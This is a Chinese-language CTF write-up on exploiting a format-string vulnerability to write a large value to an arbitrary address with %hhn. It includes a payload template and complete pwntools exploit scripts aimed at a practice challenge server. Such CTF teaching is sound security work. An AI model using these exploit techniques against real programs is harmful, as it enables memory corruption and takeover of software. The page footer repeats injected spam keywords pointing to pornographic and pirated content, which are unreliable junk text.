Python網(wǎng)絡(luò)安全格式字符串漏洞任意地址覆蓋大數(shù)字詳解

更新時(shí)間：2021年10月14日 14:34:50 作者：gxhhh191

這篇文章主要介紹了Python網(wǎng)絡(luò)安全格式字符串漏洞任意地址覆蓋大數(shù)字的示例詳解，有需要的朋友可以借鑒參考下，希望能夠有所幫助，祝大家多多進(jìn)步

格式化字符串漏洞覆蓋大數(shù)字時(shí)，如果選擇一次性輸出大數(shù)字個(gè)字節(jié)來進(jìn)行覆蓋，會很久很久，或者直接報(bào)錯(cuò)中斷，所以來搞個(gè)攻防世界高手區(qū)的題目來總結(jié)一下

pwn高手區(qū)，實(shí)時(shí)數(shù)據(jù)監(jiān)測這道題，就是格式化字符串漏洞覆蓋大數(shù)字

請?zhí)砑訄D片描述

題目運(yùn)行時(shí)會直接告訴你key的地址，我們只需要利用imagemagic中的printf利用格式化字符串漏洞來覆蓋就行了，但就像剛才說的，直接覆蓋時(shí)間太久了而且會報(bào)錯(cuò)，所以可以想想別的辦法

如果我們想覆蓋key為0x02223322，那么根據(jù)小端存儲，在內(nèi)存中就是\x22 \x33 \x22 \x02，高地址放高位，低地址放低位

在格式化字符串中，%hhn會向某個(gè)地址寫入單字節(jié)，%hn 會向某個(gè)地址寫入雙字節(jié)，單字節(jié)的用的比較多

在這道題中，要覆蓋的地址為0x0804a048，要覆蓋的數(shù)據(jù)為0x02223322，相當(dāng)于

0x0804a048 \x22
0x0804a049 \x33
0x0804a04a \x22
0x0804a04b \x02

字符串偏移用%p計(jì)算出來為12

請?zhí)砑訄D片描述

所以payload構(gòu)造如下

payload = p32(0x0804a048)+p32(0x0804a049)+p32(0x0804a04a)+p32(0x0804a04b)+b'a'*() + b'%12$n'+b'a'*() + b'%13$n' + b'a'*()+b'%14$n' + b'a'*() + b'%15$n'

很麻煩，但是wiki中給出了一個(gè)模板，無論在x86還是x64下都能使用

模板如下

#prev表示前面已輸出的字節(jié)
#word表示應(yīng)該輸出的字節(jié)
#index表示偏移量
def fmt(prev, word, index):
    if prev < word:
        result = word - prev
        fmtstr = "%" + str(result) + "c"
    elif prev == word:
        result = 0
    else:
        result = 256 + word - prev
        fmtstr = "%" + str(result) + "c"
    fmtstr += "%" + str(index) + "$hhn"
    return fmtstr
#offset表示起始偏移量，比如這題為12
#size表示字節(jié)長度，x86為4，x64為8
#addr表示要覆蓋的地址，這題為0x0804a048
#target表示要覆蓋的值，這題為0x02223322
def fmt_str(offset, size, addr, target):
    payload = ""
    for i in range(4):
        if size == 4:
            payload += p32(addr + i)
        else:
            payload += p64(addr + i)
    prev = len(payload)
    for i in range(4):#一次傳送一個(gè)字節(jié)
        payload += fmt(prev, (target >> i * 8) & 0xff, offset + i)
        prev = (target >> i * 8) & 0xff
    return payload
payload = fmt_str(12,4,0x0804A048,0x02223322)

這里要注意一下prev > word的情況，因?yàn)橐呀?jīng)輸出的字符串大于了我們要輸入的數(shù)值，所以前面加了256，一次只接受一個(gè)字節(jié)，用溢出來穿，比如prev = 2，word = 1，result = 255，再算上之前已經(jīng)傳的2，一共是257，溢出之后就是1，就是我們要傳的數(shù)值

完整exp如下我用的高版本烏班圖，然后是python3，所以做了一些修改，來保證bytes和str

from pwn import *
p = remote('111.200.241.244', '58464')
# p = process("./hello_pwn")
# p.recvuntil(b"Please closing the reaction kettle\n")
# p.recvuntil(b"The switch is:0x4006b0\n")
# p.recvuntil(b">\x00")
# payload = p64(0x04005F6) + 35795745*b'\x00' + b'%12$n'#第12個(gè)參數(shù) AAAA
# payload = fmtstr_payload(12,{0x804a048:0x02223322})
# payload = p32(0x0804a048)+p32(0x0804a049)+p32(0x0804a04a)+p32(0x0804a04b)+b'a'*() + b'%12$n'+b'a'*() + b'%13$n' + b'a'*()+b'%14$n' + b'a'*() + b'%15$n'
def fmt(prev,word,index):
    if prev < word:
        result = word - prev
        fmtstr = ('%' + str(result) + 'c').encode()
    elif prev == word:
        result = 0
    else:
        result = 256 + word - prev
        fmtstr = ('%' + str(result) + 'c').encode()
    fmtstr += ('%' + str(index) + '$hhn').encode()
    return fmtstr
def fmt_str(offset,size,addr,target):
    payload = b""
    for i in range(4):
        if size == 4:
            payload += p32(addr + i)
        else:
            payload += p64(addr + i)
    prev = len(payload)
    for i in range(4):
        payload += fmt(prev, (target >> i *8) & 0xff, offset + i)
        prev = (target >> i * 8) & 0xff
    return payload
payload =fmt_str(12,4,0x804a048,0x2223322)
p.sendline(payload)
p.interactive()

請?zhí)砑訄D片描述

參考ctf-wiki 跳轉(zhuǎn)處

也可以直接用fmtstr_payload，它是pwntools中的一個(gè)工具，可以簡化格式化字符串漏洞的利用

pwnlib.fmtstr.fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte') → str

第一個(gè)參數(shù)為偏移，第二個(gè)參數(shù){addr:value}表示寫入的數(shù)據(jù)，第三個(gè)參數(shù)表示已輸出的字符，這里默認(rèn)值為0，我就沒寫，第四個(gè)參數(shù)表示寫入?yún)?shù)一次寫入的大小，有byte，short，int，對應(yīng)hhn，hn，n

官方文檔

exp如下

from pwn import *

p = remote('111.200.241.244', '58464')

payload = fmtstr_payload(12,{0x804a048:0x02223322})
p.sendline(payload)
p.interactive()

非常簡短，很方便

以上就是Python網(wǎng)絡(luò)安全格式字符串漏洞任意地址覆蓋大數(shù)字詳解的詳細(xì)內(nèi)容，更多關(guān)于Python格式化字符串漏洞覆蓋大數(shù)字的資料請關(guān)注腳本之家其它相關(guān)文章！

您可能感興趣的文章:

国产无遮挡裸体免费直播视频,久久精品国产蜜臀av,动漫在线视频一区二区,欧亚日韩一区二区三区,久艹在线免费视频,国产精品美女网站免费,正在播放 97超级视频在线观看,斗破苍穹年番在线观看免费,51最新乱码中文字幕

Python網(wǎng)絡(luò)安全格式字符串漏洞任意地址覆蓋大數(shù)字詳解

相關(guān)文章

最新評論

大家感興趣的內(nèi)容

最近更新的內(nèi)容

常用在線小工具

国产无遮挡裸体免费直播视频,久久精品国产蜜臀av,动漫在线视频一区二区,欧亚日韩一区二区三区,久艹在线 免费视频,国产精品美女网站免费,正在播放 97超级视频在线观看,斗破苍穹年番在线观看免费,51最新乱码中文字幕

Python網(wǎng)絡(luò)安全格式字符串漏洞任意地址覆蓋大數(shù)字詳解

相關(guān)文章

最新評論

大家感興趣的內(nèi)容

最近更新的內(nèi)容

常用在線小工具

国产无遮挡裸体免费直播视频,久久精品国产蜜臀av,动漫在线视频一区二区,欧亚日韩一区二区三区,久艹在线免费视频,国产精品美女网站免费,正在播放 97超级视频在线观看,斗破苍穹年番在线观看免费,51最新乱码中文字幕